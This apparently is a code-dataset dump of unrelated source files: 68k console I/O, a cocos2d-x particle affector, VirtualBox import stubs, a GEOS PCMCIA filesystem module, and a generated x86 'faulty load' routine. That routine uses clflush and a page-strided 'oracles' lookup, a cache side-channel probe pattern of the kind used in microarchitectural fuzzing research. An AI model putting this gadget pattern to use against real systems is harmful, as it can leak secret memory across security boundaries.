text stringlengths 1 1.05M |
|---|
; Console I/O Entry 1998 Tony Tebby
; 2004-03-27 1.01 compatible with new cursor toggle
;
; Entry point for all Bit Image I/O calls: translates the
; supplied parameters to those used by the medium level routines
; and calls them.
;
; Registers:
; Entry Exit
; D0 I/O key error code
; D1 parameter return
; D2 parameter smashed
; D3 0 on first entry, else -1 smashed
; D4-D7 smashed
; A0 base of cdb preserved
; A1 parameter return
; A2
; A3 base of dddb preserved
; A4/A5 preserved
; A6 base of sysvars preserved
; A7 system stack pointer preserved
;
section con
include 'dev8_keys_err'
include 'dev8_keys_sys'
include 'dev8_keys_con'
xref cn_curtg
xref cn_donl
xref.s cn.iotab
xref cn_iotab
xdef cn_io
cn..crem equ 0
cn.cremv equ 1
cn_io
cmp.w #cn.iotab,d0 ; out of range?
bhi.s cn_unimp
move.w d0,d7
add.w d7,d7 ; get offset in table
move.w cn_iotab(pc,d7.w),d7 ; offset of routine
bclr #cn..crem,d7 ; does it require the cursor removed?
beq.s cn_doio ; no, just do I/O
tst.b sys_dfrz(a6) ; display frozen?
bne.s cni_nc ; .... yyyyyyes
move.b sd_curf(a0),-(a7) ; keep old status
tst.b sd_curf(a0) ; cursor visible?
ble.s cni_dfio ; ... no, ok
move.b #-1,sd_curf(a0)
jsr cn_curtg(pc) ; toggle cursor - make invisible
cni_dfio
bsr.s cn_doio ; do the I/O
move.b (a7)+,sd_curf(a0) ; old cursor status
tst.b sd_curf(a0) ; needs to be visible?
ble.s cni_rtd0 ; nope, just return, then
;
; The next bit if code is intended to reproduce a bug in the QL console driver
; which does not do a pending newline on exit from SBYT or SMUL if the cursor
; is enabled (indeed, it goes completely wrong if the newline is implicit)
;
btst #0,sd_nlsta(a0) ; pending newline required?
beq.s cni_crest ; ... no
jsr cn_donl ; ... yes, do it
; move.b #1,sd_curf(a0) ; show cursor needs to be visible
cni_crest
jmp cn_curtg ; yes, flip it back
cni_rtd0
tst.l d0
rts
cni_nc
moveq #err.nc,d0
rts
cn_doio
jmp cn_iotab(pc,d7.w)
cn_unimp
moveq #err.ipar,d0
rts
end
|
/****************************************************************************
Copyright (C) 2013 Henry van Merode. All rights reserved.
Copyright (c) 2015 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CCPUSineForceAffector.h"
#include "extensions/Particle3D/PU/CCPUParticleSystem3D.h"
NS_CC_BEGIN
// Constants
const float PUSineForceAffector::DEFAULT_FREQ_MIN = 1.0f;
const float PUSineForceAffector::DEFAULT_FREQ_MAX = 1.0f;
//-----------------------------------------------------------------------
PUSineForceAffector::PUSineForceAffector(void) :
PUBaseForceAffector(),
_angle(361),
_frequencyMin(DEFAULT_FREQ_MIN),
_frequencyMax(DEFAULT_FREQ_MAX),
_frequency(1.0f)
{
}
PUSineForceAffector::~PUSineForceAffector( void )
{
}
//-----------------------------------------------------------------------
void PUSineForceAffector::preUpdateAffector(float deltaTime)
{
// Scale by time
_angle += _frequency * deltaTime;
float sineValue = sin(_angle);
_scaledVector = _forceVector * deltaTime * sineValue;
if (_angle > M_PI * 2.0f)
{
_angle = 0.0f;
if (_frequencyMin != _frequencyMax)
{
_frequency = cocos2d::random(_frequencyMin, _frequencyMax);
}
}
}
//-----------------------------------------------------------------------
const float PUSineForceAffector::getFrequencyMin(void) const
{
return _frequencyMin;
}
//-----------------------------------------------------------------------
void PUSineForceAffector::setFrequencyMin(const float frequencyMin)
{
_frequencyMin = frequencyMin;
if (frequencyMin > _frequencyMax)
{
_frequency = frequencyMin;
}
}
//-----------------------------------------------------------------------
const float PUSineForceAffector::getFrequencyMax(void) const
{
return _frequencyMax;
}
//-----------------------------------------------------------------------
void PUSineForceAffector::setFrequencyMax(const float frequencyMax)
{
_frequencyMax = frequencyMax;
_frequency = frequencyMax;
}
//-----------------------------------------------------------------------
void PUSineForceAffector::updatePUAffector( PUParticle3D *particle, float deltaTime )
{
//for (auto iter : _particleSystem->getParticles())
{
//PUParticle3D *particle = iter;
// Affect the direction
if (_forceApplication == FA_ADD)
{
particle->direction += _scaledVector;
}
else
{
particle->direction = (particle->direction + _forceVector) / 2;
}
}
}
PUSineForceAffector* PUSineForceAffector::create()
{
auto psfa = new (std::nothrow) PUSineForceAffector();
psfa->autorelease();
return psfa;
}
void PUSineForceAffector::copyAttributesTo( PUAffector* affector )
{
PUAffector::copyAttributesTo(affector);
PUSineForceAffector* sineForceAffector = static_cast<PUSineForceAffector*>(affector);
sineForceAffector->_frequencyMin = _frequencyMin;
sineForceAffector->_frequencyMax = _frequencyMax;
sineForceAffector->_frequency = _frequency;
sineForceAffector->_angle = _angle;
}
NS_CC_END
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r13
push %r14
push %r8
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x5d0, %r14
nop
nop
nop
nop
and %r13, %r13
movb $0x61, (%r14)
nop
nop
nop
nop
add %r8, %r8
lea addresses_D_ht+0x13def, %r10
nop
sub $20885, %r8
movups (%r10), %xmm5
vpextrq $1, %xmm5, %r11
nop
nop
nop
nop
nop
inc %r11
lea addresses_WT_ht+0x1edf8, %r10
nop
add $33867, %rcx
vmovups (%r10), %ymm4
vextracti128 $0, %ymm4, %xmm4
vpextrq $0, %xmm4, %r14
nop
nop
nop
nop
nop
lfence
lea addresses_A_ht+0x1d678, %r14
add %rbx, %rbx
mov $0x6162636465666768, %rcx
movq %rcx, (%r14)
nop
nop
nop
add $11314, %r8
lea addresses_WC_ht+0x720, %rsi
lea addresses_WT_ht+0x7ec9, %rdi
clflush (%rdi)
nop
nop
dec %r11
mov $9, %rcx
rep movsl
dec %r13
lea addresses_A_ht+0x100d4, %rsi
lea addresses_WC_ht+0x1ea50, %rdi
nop
and $21995, %r10
mov $86, %rcx
rep movsl
sub %r11, %r11
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r8
pop %r14
pop %r13
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r14
push %r15
push %r8
push %r9
push %rbx
push %rdx
// Store
lea addresses_A+0x348, %r14
nop
xor $18396, %r15
movw $0x5152, (%r14)
nop
nop
xor $13744, %rbx
// Store
lea addresses_US+0x156f8, %rbx
clflush (%rbx)
nop
nop
nop
inc %rdx
movb $0x51, (%rbx)
nop
nop
dec %rdx
// Store
lea addresses_PSE+0x123a0, %r15
clflush (%r15)
nop
sub %r12, %r12
mov $0x5152535455565758, %r14
movq %r14, (%r15)
nop
nop
nop
nop
and $58978, %r12
// Faulty Load
lea addresses_normal+0xe678, %r15
dec %r12
vmovups (%r15), %ymm2
vextracti128 $0, %ymm2, %xmm2
vpextrq $0, %xmm2, %r14
lea oracles, %rbx
and $0xff, %r14
shlq $12, %r14
mov (%rbx,%r14,1), %r14
pop %rdx
pop %rbx
pop %r9
pop %r8
pop %r15
pop %r14
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_normal', 'size': 16, 'AVXalign': True, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_US', 'size': 1, 'AVXalign': False, 'NT': True, 'congruent': 5, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_normal', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'size': 1, 'AVXalign': True, 'NT': False, 'congruent': 3, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 11, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 0, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 2, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 1, 'same': False}}
{'34': 454}
34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34
*/
|
; $Id: Win2kWorkaroundsA.asm $
;; @file
; VirtualBox Windows Guest Shared Folders - Windows 2000 Hacks, Assembly Parts.
;
;
; Copyright (C) 2006-2017 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtualbox.org. This file is free software;
; you can redistribute it and/or modify it under the terms of the GNU
; General Public License (GPL) as published by the Free Software
; Foundation, in version 2 as it comes in the "COPYING" file of the
; VirtualBox OSE distribution. VirtualBox OSE is distributed in the
; hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
;
;*******************************************************************************
;* Header Files *
;*******************************************************************************
%include "iprt/asmdefs.mac"
%ifndef RT_ARCH_X86
%error "This is x86 only code.
%endif
%macro MAKE_IMPORT_ENTRY 2
extern _ %+ %1 %+ @ %+ %2
global __imp__ %+ %1 %+ @ %+ %2
__imp__ %+ %1 %+ @ %+ %2:
dd _ %+ %1 %+ @ %+ %2
%endmacro
BEGINDATA
;MAKE_IMPORT_ENTRY FsRtlTeardownPerStreamContexts, 4
MAKE_IMPORT_ENTRY RtlGetVersion, 4
MAKE_IMPORT_ENTRY PsGetProcessImageFileName, 4
|
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Geoworks 1994 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: pgfsDevSpec.asm
AUTHOR: Chris Boyke
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 4/27/94 Initial version.
DESCRIPTION:
$Id: pgfsDevSpec.asm,v 1.1 97/04/18 11:46:36 newdeal Exp $
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
Resident segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevExit
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Finish with the filesystem
CALLED BY: GFSExit
PASS: nothing
RETURN: nothing
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevExit proc far
.enter
.leave
ret
GFSDevExit endp
Resident ends
Movable segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevMapDir
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Bring in the contents of the indicated directory
CALLED BY: EXTERNAL
PASS: dxax = offset of directory
RETURN: carry set on error:
ax = FileError
es, di = destroyed
carry clear if ok:
es:di = first entry in the directory
ax = destroyed
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevMapDir proc near
uses ds, bx
.enter
call PGFSMapOffsetFar
.leave
ret
GFSDevMapDir endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevUnmapDir
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Unmap a directory
CALLED BY: EXTERNAL
PASS: nothing
RETURN: nothing
DESTROYED: nothing (flags preserved)
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevUnmapDir equ PGFSUnmapLastOffset
Movable ends
Resident segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevMapEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Bring in the extended attributes for a file.
CALLED BY: EXTERNAL
PASS: dxax = offset of extended attributes
RETURN: carry set on error:
ax = FileError for caller to return
carry clear if ok:
es:di = GFSExtAttrs
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevMapEA proc far
uses ds, bx
.enter
call PGFSMapOffset
.leave
ret
GFSDevMapEA endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevUnmapEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Unlock the extended attributes we read in last.
CALLED BY: EXTERNAL
PASS: nothing
RETURN: nothing
DESTROYED: nothing (flags preserved)
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevUnmapEA equ PGFSUnmapLastOffset
Resident ends
Movable segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevFirstEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Figure the offset of the first extended attribute
structure for this directory.
CALLED BY: EXTERNAL
PASS: dxax = base of directory
cx = # directory entries in there
RETURN: dxax = offset of first extended attribute structure
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevFirstEA proc far
uses bx, si
.enter
movdw bxsi, dxax
mov ax, size GFSDirEntry
mul cx
adddw dxax, bxsi
;
; Round the thing to a 256-byte boundary.
;
adddw dxax, <size GFSExtAttrs-1>
andnf ax, not (size GFSExtAttrs-1)
.leave
ret
GFSDevFirstEA endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevNextEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Figure out the start of the next GFSExtAttrs structure in
a directory, given the offset of the current one
CALLED BY: EXTERNAL
PASS: dxax = base of current ea structure
RETURN: dxax = base of next
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevNextEA proc near
.enter
add ax, size GFSExtAttrs
adc dx, 0
.leave
ret
GFSDevNextEA endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevLocateEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Locate the extended attrs for a file given the base of
the directory that contains it, the number of entries
in the directory, and the entry # of the file in the directory
CALLED BY: EXTERNAL
PASS: dxax = base of directory
cx = # of entries in the directory
bx = entry # within the directory
RETURN: dxax = base of extended attrs
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevLocateEA proc near
uses cx, si
.enter
call GFSDevFirstEA
movdw cxsi, dxax
mov ax, size GFSExtAttrs
mul bx
adddw dxax, cxsi
.leave
ret
GFSDevLocateEA endp
Movable ends
Resident segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevLock
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Gain exclusive access to the filesystem
CALLED BY: EXTERNAL
PASS: al - GFSDevLockFlags
es:bx - GFSFileEntry (if GDLF_FILE is set)
es:si - DiskDesc (if GDLF_DISK set)
RETURN: nothing
DESTROYED: ax
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/1/94 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevLock proc far
uses ds, bx, cx
.enter
call LoadVarSegDS
PSem ds, fileSem
test al, mask GDLF_FILE
jz notFile
mov bx, es:[bx].GFE_socket
store:
mov ds:[curSocketPtr], bx
done:
.leave
ret
notFile:
test al, mask GDLF_DISK
jz done
;
; Hack! Store the disk handle in dgroup, in case we ever use
; it (open/close notification)
;
mov ds:[gfsDisk], si
push si
mov si, es:[si].DD_drive
mov si, es:[si].DSE_private
mov bx, es:[si].PGFSPD_socketPtr
pop si
jmp store
GFSDevLock endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevUnlock
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Release exclusive access to the filesystem.
CALLED BY: EXTERNAL
PASS: nothing
RETURN: nothing
DESTROYED: nothing (flags preserved)
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevUnlock proc far
uses ds, bx, ax
EC < uses si >
.enter
pushf
call LoadVarSegDS
EC < mov ds:[curSocketPtr], -1 >
EC < tst ds:[fsMapped] >
EC < ERROR_NZ SOMETHING_NOT_UNMAPPED >
VSem ds, fileSem, TRASH_AX_BX
popf
.leave
ret
GFSDevUnlock endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevRead
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Read bytes from the filesystem
CALLED BY: EXTERNAL
PASS: dxax = offset from which to read them
cx = number of bytes to read
es:di = place to which to read them
RETURN: carry set on error:
ax = FileError
carry clear if all bytes read
ax = destroyed
DESTROYED: nothing
SIDE EFFECTS: none
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevRead proc far
uses bx, cx, dx, di, si, bp, ds
.enter
mov bp, cx ; number of bytes to move
mapLoop:
;
; Map in the initial data. Comes back with es:di = data, but we need
; ds:si
;
push es, di
call PGFSMapOffset
mov bl, ds:[bx].PGFSSI_flags
segmov ds, es, si
mov si, di
pop es, di
jc done
;
; Figure number of bytes to use from this bank.
;
mov cx, BANK_SIZE
sub cx, si ; cx <- # bytes to bank end
cmp cx, bp ; more than we need?
jbe moveIt ; no
mov cx, bp ; get only what we need
moveIt:
;
; Reduce overall count by the number of bytes being moved now, then
; move them.
;
add ax, cx
adc dx, 0 ; point dx:ax to to start of
; next bank
sub bp, cx
pushf ; save Z flag from subtraction
test bl, mask PSF_16_BIT
jz moveBytes
shr cx
rep movsw
jnc afterMove
movsb
afterMove:
EC < call PGFSUnmapLastOffset >
popf ; restore Z flag
jnz mapLoop
done:
.leave
ret
moveBytes:
rep movsb
jmp afterMove
GFSDevRead endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSUnmapLastOffset
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Unmap the thing we mapped before
CALLED BY: INTERNAL
PASS: nothing
RETURN: nothing
DESTROYED: nothing (flags preserved)
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
Don't actually do anything
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/16/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSUnmapLastOffset proc far
if ERROR_CHECK
uses ds, ax
.enter
pushf
call LoadVarSegDS
clr ax
xchg ax, ds:[fsMapped]
tst ax
ERROR_Z NOTHING_MAPPED
popf
.leave
endif
ret
PGFSUnmapLastOffset endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSDiskID
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Return an error if the card is removed
CALLED BY: GFSDiskID
PASS: es:si - DriveStatusEntry
RETURN: cx:dx - disk ID
al
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/ 5/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSDiskID proc near
uses ds, bx
.enter
call LoadVarSegDS
mov bx, es:[si].DSE_private
mov bx, es:[bx].PGFSPD_socketPtr
test ds:[bx].PGFSSI_conflict, mask PGFSCI_REMOVED
jnz error
movdw cxdx, ds:[bx].PGFSSI_checksum
mov ax, MEDIA_FIXED_DISK shl 8
done:
.leave
ret
error:
stc
jmp done
PGFSDiskID endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSPowerOn
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Turn on the power to the socket
CALLED BY: GFSDiskLock
PASS: es:bx - DriveStatusEntry
RETURN: carry clear
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
Stolen from CIDFSStrategy
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/ 5/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSPowerOn proc near
uses cx, ds
.enter
push ax, bx
call LoadVarSegDS
mov bx, es:[bx].DSE_private
mov bx, es:[bx].PGFSPD_socketPtr
;
; The synchronization here is ugly. Because the conflict resolution
; stuff may need to wake up a bunch of people, it does a VAllSem
; followed by setting the Sem_value to 0 (both are done within a
; single critical section). Because we could context-switch between
; checking the _conflict variable and performing a PSem, ending up
; with us blocked on the semaphore with _conflict set FALSE (i.e.
; blocking until the next time the card is removed), we enter our
; own critical section before checking the _conflict flag, leaving it
; only after we've decremented Sem_value. We don't even check the result
; of the decrement as we know that if _conflict is TRUE, we should
; always block.
;
; Now, when ObjectionResolved performs its VAllSem, if there aren't
; -Sem_value threads on the queue, Sem_queue will end up a positive
; number that will keep us from blocking at all. If the conflict isn't
; resolved before we block, it's just as if we'd done a normal PSem.
; If the conflict is resolved before we block, we won't actually
; block.
;
; While it's true that another conflict could arise after
; the VAllSem is complete and before we block, which means that we
; (or some other thread) won't actually block when we're supposed to,
; and the counter will be off forever, I don't think I care enough
; to worry about it.
;
call SysEnterCritical
test ds:[bx].PGFSSI_conflict, mask PGFSCI_REMOVED
jz continuePowerOn
;
; check to see if the thread is the pcmcia
; thread, if it is do not dec the semaphore. this is done to
; prevent the pcmcia thread from blocking on the conflict and
; then not being able to clear the conflict.
;
cmp ss:[TPD_processHandle], handle pcmcia
je continuePowerOn
dec ds:[bx].PGFSSI_conflictSem.Sem_value
call SysExitCritical
mov ax, ds ; ax:bx <- queue on which to block
add bx, offset PGFSSI_conflictSem.Sem_queue
call ThreadBlockOnQueue
jmp continuePowerOn_CriticalExited
